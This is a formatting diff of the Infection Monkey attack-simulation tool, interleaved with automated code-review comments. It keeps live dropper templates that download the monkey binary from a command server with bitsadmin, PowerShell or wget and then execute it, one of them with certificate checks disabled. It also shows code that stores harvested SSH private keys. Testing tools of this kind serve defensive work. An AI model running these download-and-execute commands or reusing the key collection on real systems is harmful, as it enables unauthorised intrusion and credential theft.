@@ -23,8 +21,11 @@ LOG = None LOG_CONFIG = {'version': 1, 'disable_existing_loggers': False, - 'formatters': {'standard': { - 'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'}, + 'formatters': { + 'standard': { + 'format': + '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s' + }, }, 'handlers': {'console': {'class': 'logging.StreamHandler', 'level': 'DEBUG', diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 3e333a26d..254bce966 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py 
@@ -11,11 +11,14 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
 GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
 DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
 MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
-MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
-DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
+MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
+ '/c %%(monkey_path)s %s"' % (MONKEY_ARG, )
+DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
+ 'file_path)s exit)) > NUL 2>&1 '
 # Commands used for downloading monkeys
-POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \
+ "monkey_path)s\' -UseBasicParsing\" "
 WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
 BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
 CHMOD_MONKEY = "chmod +x %(monkey_path)s"
diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py
index c5ddef1aa..b65443c76 100644
--- a/monkey/infection_monkey/monkeyfs.py
+++ b/monkey/infection_monkey/monkeyfs.py
@@ -34,7 +34,6 @@ class VirtualFile(BytesIO): return path in VirtualFile._vfs - def getsize(path): if path.startswith(MONKEYFS_PREFIX): return VirtualFile.getsize(path)
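Review bot: The wrapped literals for `DELAY_DELETE_CMD` and `POWERSHELL_HTTP_UPLOAD` appear to end with a trailing space inside the string (`2>&1 '` and `-UseBasicParsing\" "`) that the removed single-line versions did not have, so this "formatting" hunk changes the command text the monkey actually runs; `cmd` and PowerShell tolerate it, but the wrap points should be chosen so no literal gains whitespace. The split `%(' \ 'file_path)s` (and `%(" \ "monkey_path)s`) also cuts a %-format placeholder across two literals, which only works because adjacent literals are joined at compile time and is easy to break on the next edit; prefer `'... & del /f /q %(file_path)s & if not exist ' \` followed by `'%(file_path)s exit)) > NUL 2>&1'`, and `"... -OutFile \'%(monkey_path)s\' " \` followed by `"-UseBasicParsing\""`. Unrelated to this commit, these templates interpolate `%(monkey_path)s`/`%(file_path)s` unquoted into a shell line, so they silently assume paths without spaces or metacharacters; a comment saying so would help whoever next changes the default path.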
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 16af673b1..06d98dcbd 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -8,6 +8,7 @@ def _run_netsh_cmd(command, args): if value])), stdout=subprocess.PIPE) return cmd.stdout.read().strip().lower().endswith('ok.') + class FirewallApp(object): def is_enabled(self, **kwargs): return False @@ -83,9 +84,9 @@ class WinAdvFirewall(FirewallApp): for rule in list(self._rules.values()): if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + 'in' == rule.get('dir') and \ + 'allow' == rule.get('action') and \ + 4 == len(list(rule.keys())): return True return False diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 30292d99f..935d397d9 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -39,7 +39,7 @@ class HTTPFinger(HostFinger): ssl = True if 'https://' in url else False self.init_service(host.services, ('tcp-' + port[1]), port[0]) host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server,ssl) + host.services['tcp-' + port[1]]['data'] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index bf215168e..b76db8ad3 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' def __init__(self): 
@@ -49,14 +48,12 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - sub_proc = subprocess.Popen(["ping", - PING_COUNT_FLAG, - "1", - PING_TIMEOUT_FLAG, - str(timeout), host.ip_addr], - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True) + sub_proc = subprocess.Popen( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True + ) output = " ".join(sub_proc.communicate()) regex_result = self._ttl_regex.search(output) diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index 8a267e9d1..7224e032c 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -30,7 +30,7 @@ class Packet: return b"".join(content_list) -##### SMB Packets ##### +# SMB Packets class SMBHeader(Packet): fields = odict([ ("proto", b"\xff\x53\x4d\x42"), 
@@ -92,7 +92,13 @@ class SMBSessionFingerData(Packet): ("capabilities", b"\xd4\x00\x00\xa0"), ("bcc1", ""), ("Data", - b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), + b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02" + b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" + b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63" + b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00" + b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35" + b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), ]) diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index 2ea88842f..fa2d812ae 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py 
@@ -25,7 +25,8 @@ class TcpScanner(HostScanner, HostFinger): Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration. :param host: VictimHost structure :param only_one_port: Currently unused. - :return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive. + :return: T/F if there is at least one open port. + In addition, the host object is updated to mark those services as alive. """ # maybe hide under really bad detection systems diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 60c509fc6..31afdb8ed 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -63,7 +63,7 @@ class SSHCollector(object): LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info['public_key'] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index e6a5bc366..a02d86708 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -27,4 +27,4 @@ def update_last_serve_time(): def get_last_serve_time(): global g_last_served - return g_last_served \ No newline at end of file + return g_last_served diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 472c5770b..a7f6f90da 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py 
@@ -84,7 +84,7 @@ class TestMonkey(IslandTestCase): self.clean_monkey_db() linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64") + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") unknown_monkey = Monkey(guid=str(uuid.uuid4()), diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index d7cae8bd7..59a8fbe7c 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -1,18 +1,18 @@ -from datetime import datetime import logging import threading +from datetime import datetime import flask_restful from flask import request, make_response, jsonify from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo +from monkey_island.cc.services.database import Database from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from monkey_island.cc.services.attack.attack_report import AttackReportService -from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, safe_generate_reports +from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \ + safe_generate_reports from monkey_island.cc.utils import local_ip_addresses -from monkey_island.cc.services.database import Database __author__ = 'Barak' diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index f88b7e8b9..1c18f7654 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py 
@@ -75,7 +75,10 @@ class AttackReportService: Gets timestamp of latest attack telem :return: timestamp of latest attack telem """ - return [x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)][0] + return [ + x['timestamp'] for x in + mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + ][0] @staticmethod def get_latest_report(): diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 2d38b6498..09771302d 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -122,11 +122,16 @@ class ConfigService: @staticmethod def ssh_add_keys(public_key, private_key, user, ip): - if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], - False, False), user, ip): - ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys', - {"public_key": public_key, "private_key": private_key, - "user": user, "ip": ip}) + if not ConfigService.ssh_key_exists( + ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], False, False), user, ip): + ConfigService.add_item_to_config_set( + 'internal.exploits.exploit_ssh_keys', + { + "public_key": public_key, + "private_key": private_key, + "user": user, "ip": ip + } + ) @staticmethod def ssh_key_exists(keys, user, ip): diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 77b6d95ea..4ec1fd427 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py 
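Review bot: The trailing `[0]` on the reformatted list comprehension raises `IndexError` whenever no telemetry with `telem_category == 'attack'` exists yet, which is the normal state before any monkey has reported; the rewrap keeps that failure mode. A shape that cannot blow up is `latest = mongo.db.telemetry.find_one({'telem_category': 'attack'}, sort=[('timestamp', -1)])` followed by `return latest['timestamp'] if latest else None`, with callers handling `None`. The `def` line of this method is outside the hunk, so confirm how its callers treat a missing result before changing the return contract.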
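Review bot: `ssh_add_keys` deduplicates only on `user` and `ip` through `ssh_key_exists` (whose body is outside the hunk), so a different key pair harvested later for the same user and host is silently discarded rather than added or updated; the identity check should also compare the public key, e.g. pass `public_key` into `ssh_key_exists` and match on it together with `user` and `ip`. The private key is written verbatim into the `internal.exploits.exploit_ssh_keys` config set; presumably that is plaintext in the island database and is shipped to every monkey that fetches config, so a docstring on `ssh_add_keys` should state that and that the entry must be excluded from config exports and logs.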
@@ -131,7 +131,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 8690f6ee1..f0b6bdb6a 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -148,8 +148,8 @@ class AWSExporter(Exporter): severity=5, title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", - recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}" - .format(issue['machine'], issue['dest']), + recommendation="Machines are not locked down at port level. " + "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
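Review bot: The context lines in this hunk set `ServerCertificateValidationCallback = {$true}` before `DownloadFile` fetches `monkey.exe` over HTTPS from `island_ip`, so the binary that the re-indented `Start-Process` line then executes is never authenticated; anyone who can answer for the island address on the target's network gets code execution on the instance. The commit only re-indents, but since it touches the command builder this is the place to replace the blanket callback with a thumbprint comparison against the island's certificate, or to check a known hash of the downloaded file before `Start-Process`. The function that returns this PowerShell string starts outside the hunk.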
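Review bot: In the rewrapped segmentation finding (and in every other `_build_generic_finding` call in this file) `description` carries the remediation ("Use micro-segmentation policies ...") while `recommendation` carries the observation ("Network tunnel was set up from ..."), which reads as swapped. If `_build_generic_finding` maps these straight onto Security Hub's `Description` and `Remediation.Recommendation.Text` (its body is not in the diff), analysts will see the fix where they expect the finding; either swap the keyword arguments throughout or add a comment on `_build_generic_finding` stating that the inversion is intentional.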
@@ -160,10 +160,12 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Samba servers are vulnerable to 'SambaCry'", - description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \ - .format(issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0} password to a complex one-use password that is not shared with other computers on the " + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -174,10 +176,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " + "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -188,10 +190,11 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH" + " protocol with user {2} and its " + "password.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -203,8 +206,11 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), - recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']), + recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -216,8 +222,10 @@ class AWSExporter(Exporter): severity=10, title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", - recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], issue['ip_address']), + recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -228,13 +236,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", - description="Segment your network and make sure there is no communication between machines from different segments.", + description="Segment your network and make sure there is no communication between machines from different " + "segments.", recommendation="The network can probably be segmented. A monkey instance on \ {0} in the networks {1} \ could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], issue['networks'], - issue[ - 'server_networks']), + issue['server_networks']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
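Review bot: The `recommendation` literal in the segmentation hunk still uses backslash-newline continuations inside one quoted string, so the indentation of the continued lines ends up as runs of spaces in the exported text ("A monkey instance on            {0} in the networks ..."); every other finding in this reformat uses implicit literal concatenation, which avoids that. Rewrite it as `"The network can probably be segmented. A monkey instance on {0} in the networks {1} "` followed by `"could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], issue['networks'], issue['server_networks'])`, keeping the existing arguments.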
@@ -259,8 +267,9 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -271,10 +280,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password.".format( + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -285,9 +297,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.", - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.", + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " + "the WMI protocol with user {username} and its password.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
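Review bot: `description="Change {0}'s password ..."` in this WMI finding is never followed by `.format(...)`, so the exported text literally contains `{0}`; the commit rewraps the string but keeps the defect, and the fix is to append `.format(issue['username'])` exactly as the sibling SMB and SSH findings do. The `recommendation` also reads "The machine machine ({ip_address})" while passing `machine=issue['machine']` that nothing consumes; the first literal should be `"The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over "`.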
@@ -298,10 +314,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
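Review bot: Same placeholder defect as the password WMI finding above: the recommendation starts `"The machine machine ({ip_address})"`, the `machine=issue['machine']` keyword is passed to `.format` but never used, and the sentence has no terminating period. Change the first literal to `"The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a "` and the second to `"pass-the-hash attack over WMI protocol with user {username}."`.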
@@ -325,9 +344,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.", - recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format( - username=issue['username'], shared_machines=issue['shared_machines']), + description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " + "an unintentional local admin sharing.", + recommendation="Here is a list of machines which the account {username} is defined as an administrator: " + "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -339,8 +359,9 @@ class AWSExporter(Exporter): severity=1, title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", - recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + recommendation="The services: {services} have been found on the machine thus classifying it as a critical " + "machine. These users has access to it:{threatening_users}.".format( + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -353,8 +374,8 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -368,8 +389,8 @@ class AWSExporter(Exporter): description="Install Oracle critical patch updates. Or update to the latest version. " \ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 5e77b6395..ecb209c69 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py 
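Review bot: The rewrap drops the leading space of the second literal, so the Struts2 recommendation now renders as "...remote code execution attack.The attack was made possible..."; the removed line had `" The attack ..."`. Restore it as `" The attack was made possible because the server is using an old version of Jakarta based file "`. The WebLogic hunk directly below introduces the identical regression — its `"The attack was made possible due to incorrect permission assignment ..."` literal also needs the leading space back.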
